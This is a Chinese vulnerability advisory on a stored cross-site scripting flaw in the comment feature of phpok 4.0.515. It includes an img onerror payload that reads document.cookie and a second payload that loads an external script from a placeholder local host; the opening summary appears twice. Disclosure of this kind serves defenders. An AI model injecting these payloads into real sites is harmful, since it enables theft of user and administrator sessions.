VULHUB ™

### 简要描述： phpok4.0.515过滤不严格，导致存储型跨站产生，利用此漏洞我们可以盗取用户cookie(包括管理员)、钓鱼，修改用户信息等等。 ### 详细说明： phpok4.0.515在产品展示模块的商品评论处没有对用户评论进行过滤，导致存储型XSS漏洞。 ### 漏洞证明： 官方下载地址：http://www.phpok.com/phpok.html 测试浏览器：测试浏览器：IE10、Firefox29.0.1、Chrome33.0.1750.149 m 1、在用户评论处输入以下内容，<img src=x onerror=alert(documnet.cookie)> [<img src="https://images.seebug.org/upload/201405/2711103766afa57767d3b3424c70057f9e9d8469.png" alt="phpok.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2711103766afa57767d3b3424c70057f9e9d8469.png) 2、其他用户查看商品信息时或用户评论时，漏洞触发 [<img src="https://images.seebug.org/upload/201405/2711111853be630b8ff60484aec8c12311e2a28c.png" alt="phpok2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2711111853be630b8ff60484aec8c12311e2a28c.png) 3、管理员登录系统，审核用户评论时，漏洞触发 [<img src="https://images.seebug.org/upload/201405/271111488fbf46cb7d074e63b23f81c811d38635.png" alt="phpok4.png" width="600"...

### 简要描述： phpok4.0.515过滤不严格，导致存储型跨站产生，利用此漏洞我们可以盗取用户cookie(包括管理员)、钓鱼，修改用户信息等等。 ### 详细说明： phpok4.0.515在产品展示模块的商品评论处没有对用户评论进行过滤，导致存储型XSS漏洞。 ### 漏洞证明： 官方下载地址：http://www.phpok.com/phpok.html 测试浏览器：测试浏览器：IE10、Firefox29.0.1、Chrome33.0.1750.149 m 1、在用户评论处输入以下内容，<img src=x onerror=alert(documnet.cookie)> [<img src="https://images.seebug.org/upload/201405/2711103766afa57767d3b3424c70057f9e9d8469.png" alt="phpok.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2711103766afa57767d3b3424c70057f9e9d8469.png) 2、其他用户查看商品信息时或用户评论时，漏洞触发 [<img src="https://images.seebug.org/upload/201405/2711111853be630b8ff60484aec8c12311e2a28c.png" alt="phpok2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2711111853be630b8ff60484aec8c12311e2a28c.png) 3、管理员登录系统，审核用户评论时，漏洞触发 [<img src="https://images.seebug.org/upload/201405/271111488fbf46cb7d074e63b23f81c811d38635.png" alt="phpok4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/271111488fbf46cb7d074e63b23f81c811d38635.png) 4、使用Firebug查看页面源代码： [<img src="https://images.seebug.org/upload/201405/271112159bc8b189f25665b1f390b4c019554e43.png" alt="phpok3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/271112159bc8b189f25665b1f390b4c019554e43.png) 5、修改利用利用代码为<img src=x onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);//">加载本地脚本 [<img src="https://images.seebug.org/upload/201405/271113128fc88ce768cb2bd1833c220a750a64cf.png" alt="phpok.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/271113128fc88ce768cb2bd1833c220a750a64cf.png) 6、使用Firebug查看源代码： [<img src="https://images.seebug.org/upload/201405/27111416a53ff052d8e00027bab5553f3a042dcc.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/27111416a53ff052d8e00027bab5553f3a042dcc.png) 成功加载本地脚本，通过修改本地脚本代码，我们可以对系统进行更严格的破坏